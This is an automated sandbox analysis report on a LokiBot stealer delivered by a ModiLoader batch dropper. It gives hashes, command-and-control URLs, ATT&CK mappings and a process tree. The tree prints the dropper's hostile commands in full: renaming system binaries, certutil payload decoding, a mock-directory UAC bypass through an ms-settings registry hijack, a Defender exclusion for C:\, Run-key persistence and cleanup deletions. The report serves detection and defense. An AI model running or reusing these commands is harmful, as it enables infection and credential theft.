lokibot | 73ef345268cb43f47baeb7ba75d7b08d8fd61aeef25dd65e908cf723ab4e43b7

Analysis

max time kernel
143s
max time network
115s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
25-07-2024 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6a3e2eecb7f7f464c57a7159570d2d55c6893839be852af898089550265f5dfc.cmd
Size

3.1MB
MD5

a7ecf2d80475a31c10bfdddd8c060548
SHA1

f2b81ba9aa32b39fa41558f67d2627ab3da72f29
SHA256

6a3e2eecb7f7f464c57a7159570d2d55c6893839be852af898089550265f5dfc
SHA512

64b26683677f636eaf632f11d3f9d6d7502ab17a3b102fffc66c846b53d017f2dd09c5e42bbaa7e3d07a7a98f26909cccb41a746ba520a3a9b9dce43bf7a55a5
SSDEEP

24576:eIQFfxaplqwu8YYDEWRRm0Dxb3n7o3quNeHt2T6IPGKhCNwPmOyEC5p+gP3m0nlL:eIq5a/h5YYDEcRm0D53UYHQ6hcm5ECR

Score

10^/10

lokibot modiloader collection credential_access discovery persistence spyware stealer trojan

Malware Config

Extracted

Family

lokibot

http://104.248.205.66/index.php/modify.php?edit=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

ModiLoader Second Stage 4 IoCs

resource	yara_rule
behavioral2/memory/4448-96-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/4448-94-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/4448-128-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/4448-142-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation	ypbfdsfV.pif
Key value queried	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 29 IoCs

pid	Process
3888	alpha.exe
904	alpha.exe
1112	kn.exe
4248	alpha.exe
1760	kn.exe
4116	CLEAN.COM
3036	alpha.exe
532	alpha.exe
3852	ypbfdsfV.pif
1112	alpha.exe
904	alpha.exe
796	alpha.exe
3036	alpha.exe
3804	alpha.exe
3664	alpha.exe
3192	xkn.exe
3984	alpha.exe
4268	ger.exe
4764	per.exe
392	alpha.exe
452	alpha.exe
4448	ypbfdsfV.pif
3760	alpha.exe
3636	alpha.exe
1208	alpha.exe
1436	alpha.exe
2784	alpha.exe
1200	alpha.exe
384	alpha.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	ypbfdsfV.pif
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	ypbfdsfV.pif
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	ypbfdsfV.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vfsdfbpy = "C:\\Users\\Public\\Vfsdfbpy.url"	CLEAN.COM

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4116 set thread context of 3852	4116	CLEAN.COM	108
PID 4116 set thread context of 4448	4116	CLEAN.COM	137

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ypbfdsfV.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CLEAN.COM

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
452	alpha.exe
1992	PING.EXE

Kills process with taskkill 1 IoCs

evasion

pid	Process
1600	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1992	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	37	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3192	xkn.exe
3192	xkn.exe
3192	xkn.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3192	xkn.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	4448	ypbfdsfV.pif

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2456 wrote to memory of 3748	2456	cmd.exe	86
PID 2456 wrote to memory of 3748	2456	cmd.exe	86
PID 2456 wrote to memory of 3888	2456	cmd.exe	88
PID 2456 wrote to memory of 3888	2456	cmd.exe	88
PID 3888 wrote to memory of 1140	3888	alpha.exe	89
PID 3888 wrote to memory of 1140	3888	alpha.exe	89
PID 2456 wrote to memory of 904	2456	cmd.exe	90
PID 2456 wrote to memory of 904	2456	cmd.exe	90
PID 904 wrote to memory of 1112	904	alpha.exe	91
PID 904 wrote to memory of 1112	904	alpha.exe	91
PID 2456 wrote to memory of 4248	2456	cmd.exe	92
PID 2456 wrote to memory of 4248	2456	cmd.exe	92
PID 4248 wrote to memory of 1760	4248	alpha.exe	93
PID 4248 wrote to memory of 1760	4248	alpha.exe	93
PID 2456 wrote to memory of 4116	2456	cmd.exe	94
PID 2456 wrote to memory of 4116	2456	cmd.exe	94
PID 2456 wrote to memory of 4116	2456	cmd.exe	94
PID 2456 wrote to memory of 3036	2456	cmd.exe	96
PID 2456 wrote to memory of 3036	2456	cmd.exe	96
PID 2456 wrote to memory of 532	2456	cmd.exe	97
PID 2456 wrote to memory of 532	2456	cmd.exe	97
PID 4116 wrote to memory of 3852	4116	CLEAN.COM	108
PID 4116 wrote to memory of 3852	4116	CLEAN.COM	108
PID 4116 wrote to memory of 3852	4116	CLEAN.COM	108
PID 4116 wrote to memory of 3852	4116	CLEAN.COM	108
PID 4116 wrote to memory of 3852	4116	CLEAN.COM	108
PID 3852 wrote to memory of 3992	3852	ypbfdsfV.pif	109
PID 3852 wrote to memory of 3992	3852	ypbfdsfV.pif	109
PID 3992 wrote to memory of 2392	3992	cmd.exe	112
PID 3992 wrote to memory of 2392	3992	cmd.exe	112
PID 3992 wrote to memory of 1112	3992	cmd.exe	113
PID 3992 wrote to memory of 1112	3992	cmd.exe	113
PID 3992 wrote to memory of 904	3992	cmd.exe	114
PID 3992 wrote to memory of 904	3992	cmd.exe	114
PID 3992 wrote to memory of 796	3992	cmd.exe	115
PID 3992 wrote to memory of 796	3992	cmd.exe	115
PID 796 wrote to memory of 864	796	alpha.exe	116
PID 796 wrote to memory of 864	796	alpha.exe	116
PID 3992 wrote to memory of 3036	3992	cmd.exe	117
PID 3992 wrote to memory of 3036	3992	cmd.exe	117
PID 3036 wrote to memory of 532	3036	alpha.exe	118
PID 3036 wrote to memory of 532	3036	alpha.exe	118
PID 3992 wrote to memory of 3804	3992	cmd.exe	119
PID 3992 wrote to memory of 3804	3992	cmd.exe	119
PID 3804 wrote to memory of 3784	3804	alpha.exe	120
PID 3804 wrote to memory of 3784	3804	alpha.exe	120
PID 3992 wrote to memory of 3664	3992	cmd.exe	121
PID 3992 wrote to memory of 3664	3992	cmd.exe	121
PID 3664 wrote to memory of 3192	3664	alpha.exe	122
PID 3664 wrote to memory of 3192	3664	alpha.exe	122
PID 3192 wrote to memory of 3984	3192	xkn.exe	123
PID 3192 wrote to memory of 3984	3192	xkn.exe	123
PID 3984 wrote to memory of 4268	3984	alpha.exe	124
PID 3984 wrote to memory of 4268	3984	alpha.exe	124
PID 3992 wrote to memory of 4764	3992	cmd.exe	125
PID 3992 wrote to memory of 4764	3992	cmd.exe	125
PID 3992 wrote to memory of 392	3992	cmd.exe	130
PID 3992 wrote to memory of 392	3992	cmd.exe	130
PID 392 wrote to memory of 1600	392	alpha.exe	131
PID 392 wrote to memory of 1600	392	alpha.exe	131
PID 3992 wrote to memory of 452	3992	cmd.exe	134
PID 3992 wrote to memory of 452	3992	cmd.exe	134
PID 452 wrote to memory of 1992	452	alpha.exe	135
PID 452 wrote to memory of 1992	452	alpha.exe	135

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	ypbfdsfV.pif

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	ypbfdsfV.pif

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6a3e2eecb7f7f464c57a7159570d2d55c6893839be852af898089550265f5dfc.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2456
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:3748
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3888
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:1140
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\6a3e2eecb7f7f464c57a7159570d2d55c6893839be852af898089550265f5dfc.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:904
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\6a3e2eecb7f7f464c57a7159570d2d55c6893839be852af898089550265f5dfc.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
    3⤵
    - Executes dropped EXE
    PID:1112
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4248
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
    3⤵
    - Executes dropped EXE
    PID:1760
- C:\Users\Public\Libraries\CLEAN.COM
  C:\Users\Public\Libraries\CLEAN.COM
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4116
- - C:\Users\Public\Libraries\ypbfdsfV.pif
    C:\Users\Public\Libraries\ypbfdsfV.pif
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6368.tmp\6369.tmp\636A.bat C:\Users\Public\Libraries\ypbfdsfV.pif"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3992
    - - C:\Windows\System32\extrac32.exe
        
        C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
        5⤵
        
        PID:2392
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        5⤵
        Executes dropped EXE
        
        PID:1112
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        5⤵
        Executes dropped EXE
        
        PID:904
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:796
      - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        6⤵
        
        PID:864
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3036
      - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        6⤵
        
        PID:532
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3804
      - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        6⤵
        
        PID:3784
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3664
      - C:\Users\Public\xkn.exe
        
        C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3192
        
        C:\Users\Public\alpha.exe
        
        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3984
        
        C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        8⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4268
    - - C:\Windows \System32\per.exe
        
        "C:\\Windows \\System32\\per.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4764
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:392
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM SystemSettings.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
        5⤵
        Executes dropped EXE
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of WriteProcessMemory
        
        PID:452
      - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 2
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1992
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
        5⤵
        Executes dropped EXE
        
        PID:3760
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
        5⤵
        Executes dropped EXE
        
        PID:3636
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
        5⤵
        Executes dropped EXE
        
        PID:1208
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
        5⤵
        Executes dropped EXE
        
        PID:1436
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
        5⤵
        Executes dropped EXE
        
        PID:2784
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
        5⤵
        Executes dropped EXE
        
        PID:1200
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
        5⤵
        Executes dropped EXE
        
        PID:384
- - C:\Windows\SysWOW64\extrac32.exe
    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\CLEAN.COM C:\\Users\\Public\\Libraries\\Vfsdfbpy.PIF
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3464
- - C:\Users\Public\Libraries\ypbfdsfV.pif
    C:\Users\Public\Libraries\ypbfdsfV.pif
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4448
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3036
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:532

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:5052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6368.tmp\6369.tmp\636A.bat

Filesize
1KB

MD5
e62f427202d3e5a3ba60ebe78567918c

SHA1
6ef0cd5ba6c871815fceb27ff095a7931452b334

SHA256
06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff

SHA512
e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3m5t5p4.3at.psm1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-464762018-485119342-1613148473-1000\0f5007522459c86e95ffcc62f32308f1_a18f179e-3e6f-4f43-8bbf-9eee996556bc

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-464762018-485119342-1613148473-1000\0f5007522459c86e95ffcc62f32308f1_a18f179e-3e6f-4f43-8bbf-9eee996556bc

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Public\CLEAN.GIF

Filesize
2.0MB

MD5
90dadde803ff62b49c7a6a1036c1345d

SHA1
38a66479a3a9e77e706c0d3d61c34d00abf827e6

SHA256
59d08989d1f700d980293cfb00ac9210faa20b927f1677b703a1202c845b6f6c

SHA512
8bf8efac27e3949a0188f1e2b21a1c605979f72430cc4d3b5d97ef5da3e34a2ea3953de57b1c8e6fc505d587b6cd501aa028b824bd1b7573530f80ece01896a5

Download Submit
C:\Users\Public\Libraries\CLEAN.COM

Filesize
1002KB

MD5
100c56dc1dda4a00ce29621b2e9be469

SHA1
ac6986c4529cf338e33a7e4034c4addecac18b1a

SHA256
1da560c9b053a8caf0b89f42196427c7075138b619879a8508736fd8451ecab8

SHA512
3a13c132ff90291716d8512f794b0cccff458d87039a150c10e6db5ba3954d1a9d78e8b8e1564d6876f3056492aaebfc5b11c37397a09f4a9198c03f6100d5ba

Download Submit
C:\Users\Public\Libraries\ypbfdsfV.pif

Filesize
66KB

MD5
c116d3604ceafe7057d77ff27552c215

SHA1
452b14432fb5758b46f2897aeccd89f7c82a727d

SHA256
7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

SHA512
9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/3192-74-0x00000238E1570000-0x00000238E1592000-memory.dmp

Filesize
136KB

Download
memory/3852-109-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/3852-40-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/3852-34-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/3852-39-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/3852-107-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/3852-37-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4116-28-0x0000000000400000-0x0000000000504000-memory.dmp

Filesize
1.0MB

Download
memory/4448-96-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4448-94-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4448-128-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4448-130-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4448-142-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4448-144-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download